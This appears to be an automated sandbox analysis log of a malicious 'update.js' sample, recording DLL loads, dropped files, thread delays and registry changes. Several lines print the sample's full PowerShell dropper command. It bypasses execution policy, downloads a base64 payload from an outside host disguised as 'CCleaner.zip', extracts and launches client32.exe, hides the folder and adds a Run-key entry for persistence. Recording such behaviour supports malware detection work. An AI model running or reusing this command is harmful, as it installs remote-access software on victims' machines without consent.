Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Roaming\RYMB15\NSM.ini
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | File opened: C:\Windows\SysWOW64\riched32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: update.js | Static file information: File size 4058589 > 1048576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BCYLGMFSMV
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BCYLGMFSMV
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8461
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1387
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Window / User API: threadDelayed 8118
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL
Source: C:\Windows\System32\wscript.exe TID: 2752 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5948 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5400 | Thread sleep count: 8461 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4880 | Thread sleep count: 1387 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 5824 | Thread sleep count: 112 > 30
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160 | Thread sleep count: 257 > 30
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160 | Thread sleep time: -64250s >= -30000s
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160 | Thread sleep count: 8118 > 30
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe TID: 6160 | Thread sleep time: -2029500s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 1488 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Network Connect: 149.255.36.73 443
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe "C:\Users\user\AppData\Roaming\RYMB15\client32.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $awbh='http://didsit.com/data.php?7211';$rgozcxqbn=(new-object system.net.webclient).downloadstring($awbh);$rwpjkwod=[system.convert]::frombase64string($rgozcxqbn);$asd = get-random -minimum -10 -maximum 17; $rngb=[system.environment]::getfolderpath('applicationdata')+'\rymb'+$asd;if (!(test-path $rngb -pathtype container)) { new-item -path $rngb -itemtype directory };$p=join-path $rngb 'ccleaner.zip';[system.io.file]::writeallbytes($p,$rwpjkwod);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$rngb)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $rngb 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $rngb -force; $fd.attributes='hidden';$s=$rngb+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='bcylgmfsmv';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
